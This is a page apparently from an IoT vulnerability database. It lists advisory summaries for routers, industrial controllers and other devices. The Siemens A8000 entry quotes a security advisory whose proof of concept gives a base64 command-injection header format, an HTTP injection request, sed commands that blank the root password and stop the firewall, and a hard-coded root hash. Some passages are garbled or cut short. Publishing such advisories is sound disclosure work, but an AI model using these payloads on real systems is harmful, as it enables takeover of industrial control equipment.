VARIoT IoT vulnerabilities database

Multiple WAGO devices in multiple versions may allow an authenticated remote attacker with high privileges to DoS the device by sending a malformed packet. 750-331 firmware, 750-8202 firmware, 750-8202/000-011 firmware etc. WAGO The product contains an input validation vulnerability.Service operation interruption (DoS) It may be in a state

A deserialization of untrusted data in Fortinet FortiNAC below 7.2.1, below 9.4.3, below 9.2.8 and all earlier versions of 8.x allows attacker to execute unauthorized code or commands via specifically crafted request on inter-server communication port. Note FortiNAC versions 8.x will not be fixed. Fortinet FortiNAC is a set of network access control solutions from Fortinet. This product is mainly used for network access control and IoT security protection

Zhuohao (China) Technology Co., Ltd. has been promoting the deeper practice and wider application of IT technology, creating value for users and helping customers achieve business success. Zhuohao (China) Technology Co., Ltd. NetFlow Analyzer has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.

TP-Link TL-WR940N V2/V3/V4, TL-WR941ND V5/V6, TL-WR743ND V1 and TL-WR841N V8 were discovered to contain a buffer overflow in the component /userRpm/AccessCtrlAccessTargetsRpm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted GET request

TP-Link TL-WR940N V4, TL-WR841N V8/V10, TL-WR940N V2/V3 and TL-WR941ND V5/V6 were discovered to contain a buffer overflow in the component /userRpm/QoSRuleListRpm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted GET request. TL-WR940N firmware, TL-WR841N firmware, TL-WR940N firmware etc. TP-LINK Technologies The product contains a classic buffer overflow vulnerability.Service operation interruption (DoS) It may be in a state

TP-Link TL-WR940N V2/V4/V6, TL-WR841N V8, TL-WR941ND V5, and TL-WR740N V1/V2 were discovered to contain a buffer read out-of-bounds via the component /userRpm/VirtualServerRpm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted GET request

TP-Link TL-WR940N V4 was discovered to contain a buffer overflow via the ipStart parameter at /userRpm/WanDynamicIpV6CfgRpm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted GET request

An issue in the /userRpm/LocalManageControlRpm component of TP-Link TL-WR940N V2/V4/V6, TL-WR841N V8/V10, and TL-WR941ND V5 allows attackers to cause a Denial of Service (DoS) via a crafted GET request

TP-Link TL-WR940N V4, TL-WR841N V8/V10, TL-WR740N V1/V2, TL-WR940N V2/V3, and TL-WR941ND V5/V6 were discovered to contain a buffer overflow in the component /userRpm/AccessCtrlTimeSchedRpm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted GET request. TL-WR940N firmware, TL-WR841N firmware, TL-WR740N firmware etc. TP-LINK Technologies The product contains a classic buffer overflow vulnerability.Service operation interruption (DoS) It may be in a state

netgear R6250 Firmware Version 1.0.4.48 is vulnerable to Buffer Overflow after authentication. (DoS) It may be in a state. NETGEAR R6250 is a wireless router made by NETGEAR. A remote attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service attack

Magic NX30 is a wireless router. The H3C Magic NX30 has an illogical flaw vulnerability, which can be exploited by attackers to gain control of the device.

All versions prior to 9.1.4 of Advantech WebAccess/SCADA are vulnerable to use of untrusted pointers. The RPC arguments the client sent could contain raw memory pointers for the server to use as-is. This could allow an attacker to gain access to the remote file system and the ability to execute commands and overwrite files. Advantech Provided by WebAccess/SCADA is a browser-based SCADA It's a software package. WebAccess/SCADA The following vulnerabilities exist in. It was * unreliable pointer reference (CWE-822) - CVE-2023-1437If the vulnerability is exploited, it may be affected as follows

A vulnerability was discovered in the Rockwell Automation Armor PowerFlex device when the product sends communications to the local event log. Threat actors could exploit this vulnerability by sending an influx of network commands, causing the product to generate an influx of event log traffic at a high rate. If exploited, the product would stop normal operations and self-reset creating a denial-of-service condition. The error code would need to be cleared prior to resuming normal operations. Rockwell Automation Provided by Armor PowerFlex The following vulnerabilities exist in. It was * calculation error (CWE-682) - CVE-2023-2423If the vulnerability is exploited, it may be affected as follows

A Huawei sound box product has an out-of-bounds write vulnerability. Attackers can exploit this vulnerability to cause buffer overflow. Affected product versions include:FLMG-10 versions FLMG-10 10.0.1.0(H100SP22C00)

TP-Link Archer AX10(EU)_V1.2_230220 was discovered to contain a buffer overflow via the function FUN_131e8 - 0x132B4. # Exploit Title: Buffer Overflow in TP-Link Archer AX10(EU)_V1.2_230220 # Exploit Author: Giuseppe Compare # Date : 26/05/2023 # CVE: CVE-2023-34832 # Vendor Homepage: https://www.tp-link.com/ # Version: TP-Link Archer AX10(EU)_V1.2_230220 Buffer Overflow There is a buffer overflow in the FUN_131e8 function due to using sprintf improperly, detailed in line 47-49 memset(&DAT_000283a4,0,0x800); sprintf(&DAT_000283a4,"echo \'[ %s ] %d: get OCN v6plus rules begin\n \' > /dev/console", "https_get_rules_OCN",0x3c3); system(&DAT_000283a4); //line 47-49 sprintf((char *)&local_428, "https://rule.map.ocn.ad.jp/?ipv6Prefix=%s&ipv6PrefixLength=%d&code=e8mMWklYwaGoHmT05ynqVM4kPqF9rAUnhrWCp1vWvBeSOO0pfpMokg==" ,param_2 + 0x23,param_2[0x2d]); The sprintf() function makes no guarantees regarding the length of the generated string, a sufficiently long string passed as an additional argument could generate a buffer overflow. Remediation Guarantee that storage for strings has sufficient space for character data and the null terminator. Avoid using unsafe functions such as sprintf(), consider using snprintf() or sprintf_s() and variants. Double check that your buffer is as large as you specify. Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space

There is a misinterpretation of input vulnerability in Huawei Printer. Successful exploitation of this vulnerability may cause the printer service to be abnormal. Huawei BiSheng-WNM FW is a HUAWEI printer from the Chinese company Huawei. Huawei BiSheng-WNM FW version 3.0.0.325 has a denial of service vulnerability

Improper Authorization in SSH server in Bosch VMS 11.0, 11.1.0, and 11.1.1 allows a remote authenticated user to access resources within the trusted internal network via a port forwarding request. Bosch Video Management System (BVMS) , Bosch BVMS Viewer , divar ip 3000 firmware etc. Robert Bosch GmbH The product contains an incorrect authentication vulnerability.Information may be obtained

Contiki-NG is an operating system for internet of things devices. In version 4.8 and prior, when processing ICMP DAO packets in the `dao_input_storing` function, the Contiki-NG OS does not verify that the packet buffer is big enough to contain the bytes it needs before accessing them. Up to 16 bytes can be read out of bounds in the `dao_input_storing` function. An attacker can truncate an ICMP packet so that it does not contain enough data, leading to an out-of-bounds read on these lines. The problem has been patched in the "develop" branch of Contiki-NG, and is expected to be included in release 4.9. As a workaround, one can apply the changes in Contiki-NG pull request #2435 to patch the system. Contiki-NG Exists in an out-of-bounds read vulnerability.Information is obtained and service operation is interrupted (DoS) It may be in a state. Contiki-NG 4.8 and earlier versions have a buffer error vulnerability, which is caused by an out-of-bounds read problem when processing ICMP DAO input

A vulnerability has been identified in SIMATIC PCS 7 (All versions < V9.1 SP2 UC04), SIMATIC S7-PM (All versions < V5.7 SP1 HF1), SIMATIC S7-PM (All versions < V5.7 SP2 HF1), SIMATIC STEP 7 V5 (All versions < V5.7). The affected product contains a database management system that could allow remote users with low privileges to use embedded functions of the database (local or in a network share) that have impact on the server. An attacker with network access to the server network could leverage these embedded functions to run code with elevated privileges in the database management system's server

A vulnerability has been identified in CP-8031 MASTER MODULE (All versions < CPCI85 V05), CP-8050 MASTER MODULE (All versions < CPCI85 V05). The affected devices contain the hash of the root password in a hard-coded form, which could be exploited for UART console login to the device. An attacker with direct physical access could exploit this vulnerability. The SICAM A8000 RTUs (Remote Terminal Units) series is a series of modular devices for remote control and automation applications in all areas of energy supply. SEC Consult Vulnerability Lab Security Advisory < 20230703-0 > ======================================================================= title: Multiple Vulnerabilities including Unauthenticated RCE product: Siemens A8000 CP-8050 MASTER MODULE (6MF2805-0AA00) Siemens A8000 CP-8031 MASTER MODULE (6MF2803-1AA00) vulnerable version: <= V04.92 fixed version: CPCI85 V05 CVE number: CVE-2023-28489, CVE-2023-33919, CVE-2023-33920, CVE-2023-33921 impact: Critical homepage: https://www.siemens.com found: 2023-02-15 by: Stefan Viehböck (Office Vienna) Christian Hager (Office Vienna) Steffen Robertz (Office Vienna) Gerhard Hechenberger (Office Vienna) Gorazd Jank (Office Vienna) Constantin Schieber-Knoebl (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers." Source: https://new.siemens.com/global/en/company/about.html Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. Customers should update to CPCI85 V05 or later version. (https://support.industry.siemens.com/cs/ww/en/view/109804985/) SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Unauthenticated Remote Code Execution (CVE-2023-28489) By sending an HTTP request with a crafted header to port 80/443 of the PLC, arbitrary commands can be executed as system user. The port is used to configure and control Siemens PLCs with the Siemens Toolbox II application and is typically accessible on such devices. 2) Authenticated Command Injection (CVE-2023-33919) Due to missing server-side input sanitation, any user with access to the SICAM WEB interface can execute arbitrary commands as user "root" on the device. This works by setting malicious parameters and starting an Ethernet package capture. This password hash is the same on all devices. If the corresponding password is known, it could be used to login via UART and SSH. 4) Console Login via UART (CVE-2023-33921) The UART interface can be accessed with physical access to the PCB. After connecting to the interface, boot information is given and a login prompt is provided. Proof of concept: ----------------- 1) Unauthenticated Remote Code Execution (CVE-2023-28489) To exploit this vulnerability, an HTTP request including the command must be crafted. No "/" characters can be used, therefore commands are encoded as base64, e.g., "id" as "aWQ=". The command must be provided as UPLOADFILENAME header. A full command looks as follows: ;echo aWQ=| base64 -d | sh # The following header format must be obeyed: * User-Agent: SICAM TOOLBOX II * Session-ID: [ARBITRARY 16 CHARACTERS] * UPLOADFILENAME: [COMMAND] Additionally, the request body must contain the following POST parameters: * type=20 * length=[ARBITRARY] * data=[ARBITRARY] A valid request can be seen below: ----------------------------------------------------------------------- [ POC request removed ] ----------------------------------------------------------------------- If it worked, the response body will be "type=21". Additionally, the output on the UART interface indicates code execution as root user: ----------------------------------------------------------------------- base64: /ies/IN/_: No such file or directory uid=0(root) gid=0(root) ----------------------------------------------------------------------- Subsequently, the SSH port can be opened by sending the following commands separately and encoded as base64 string. They will replace the set default root password hash with an empty password hash, reconfigure the Dropbear SSH daemon and stop the firewall: ----------------------------------------------------------------------- sed -i s'/:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo\/FWtDljQjCbm6JnZqxiMg re5P14Kv2zAH1:/:32BZgrJ3XBMoY:/' /etc/shadow sed -i s'/"$DROPBEAR_ARGS -R -s -g"/"$DROPBEAR_ARGS -R"/' /etc/init.d/dropbear /etc/init.d/dropbear restart /etc/init.d/rc.firewall stop ----------------------------------------------------------------------- After this, login via SSH as root is possible: ----------------------------------------------------------------------- ssh root@[IP] root@[IP]'s password: ~# id uid=0(root) gid=0(root) groups=0(root),10(wheel) ~# ----------------------------------------------------------------------- 2) Authenticated Command Injection (CVE-2023-33919) To trigger the command injection vulnerability, the payload must be set in the "LAN port group" field on the SICAM WEB page "Monitoring & Simulation" -> "Ethernet Packet Capture" section "Capture configuration" (other fields may also be affected). As the web interface only provides a drop-down menu, the payload must be set by manipulating the JavaScript logic or by directly manipulating the HTTP request as below, where "ping [IP]\nBBBBBBB" was set: ----------------------------------------------------------------------- POST /sicweb-ajax/rtum85/cview HTTP/1.1 Host: [HOST] User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/xml SICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT Content-Length: 198 Origin: http://[HOST] Connection: close Referer: http://[HOST]/ <?xml version="1.0" encoding="UTF-8"?> <Cmd_SetCustomViewValue><view id="packet_capture"><parameter id="p0"> <value> ping [IP] BBBBBBB</value> </parameter></view></Cmd_SetCustomViewValue> ----------------------------------------------------------------------- The line break in the payload is especially important, as the command is executed as part of a shell script. This script is generated and executed by pressing the "Start/Stop trace" button in the "Capture Controlling" section and saved as /tmp/incws_tcpdump.sh. An excerpt with the injected command is shown below: ----------------------------------------------------------------------- [...] # lets start tcpdump tcpdump -i ping [IP] BBBBBBB '(ether host 00:11:11:33:44:00) and (host 1.1.1.2 or host 2.2.2.34) and (port 999)' -C 1 -W 4 -U -w /var/log/wireshark.pcap & [...] ----------------------------------------------------------------------- The executed script creates a process running as root user, which can be seen by running "ps" on the device: ----------------------------------------------------------------------- root 1100 0.0 0.1 1784 1168 ? S Feb21 0:00 /bin/sh /etc/init.d/rc.sysinit root 1149 0.1 0.3 11768 1748 ? S1 Feb21 6:03 \_ /ies/apps/system/bin/ISV00.elf /ies/apps/sys_desc/target_rc.json [...] www-data 1487 0.0 0.6 7568 3444 ? S Feb21 0:40 \_ /usr/sbin/lighttpd -Df /etc/lighttpd/lighttpd.conf root 10655 0.0 0.2 1880 1344 ? S 04:55 0:00 \_ /bin/sh /tmp/incws_tcpdump.sh root 10667 0.0 0.2 1884 1360 ? S 04:57 0:00 \_ ping [IP] ----------------------------------------------------------------------- 3) Hard-coded Root Password (CVE-2023-33920) A hard-coded "root" user password hash can be found in the /etc/shadow file: ----------------------------------------------------------------------- root:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo/FWtDljQjCbm6JnZqxiMg re5P14Kv2zAH1:16436:0:99999:7::: ----------------------------------------------------------------------- 4) Console Login via UART (CVE-2023-33921) The serial console (UART) can be accessed on the backside of the PCB on two Vias. After removing an additional logic IC, receiving data and sending data is possible with the following UART settings: * Voltage: 3.3V * Speed: 115200 Baud * Symbol-ratio: 8 Data Bits 1 Stop Bit (8N1) Extensive boot log output can be received. Some output is shown below: ----------------------------------------------------------------------- U-Boot SPL 2013.01.01 (Jan 16 2020 - 12:56:02) BOARD : Altera SOCFPGA Cyclone V Board CLOCK: EOSC1 clock 50000 KHz [...] Starting IES system ----------------------------------- Welcome to SICAM IES ----------------------------------- Welcome to _______. __ ______ ___ .___ ___. Vulnerable / tested versions: ----------------------------- The following product has been tested: * Siemens A8000 CP-8050 04.92 * Siemens A8000 CP-8031 04.92 Vendor contact timeline: ------------------------ 2023-03-14: Contacting vendor through productcert@siemens.com, sending encrypted advisory 2023-03-29: Naming researchers involved 2023-03-31: Requesting state. Vulnerability 1 will be published first due to criticality. Rest will follow. 2023-04-11: Siemens releases advisory for unauthenticated RCE (Vulnerability 1, CVE-2023-28489) 2023-06-13: Siemens releases advisory for vulnerability 2, 3 and 4 (CVE-2023-33919, CVE-2023-33920, CVE-2023-33921) 2023-06-21: Siemens has additional feedback regarding the contents of the advisory. 2023-07-03: Release of security advisory. Solution: --------- Update to firmware CPCI85 V05 or later version, see vendor advisory for further information: https://cert-portal.siemens.com/productcert/html/ssa-472454.html https://cert-portal.siemens.com/productcert/html/ssa-731916.html Workaround: ----------- Restrict network access to the A8000 CP-8050/CP8031 module or disable the Toolbox II communication on port 80/443. Make sure to strictly limit physical access to the PLC during and also after its life cycle. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Stefan Viehböck, Christian Hager, Steffen Robertz, Gerhard Hechenberger, Gorazd Jank, Constantin Schieber-Knoebl / @2023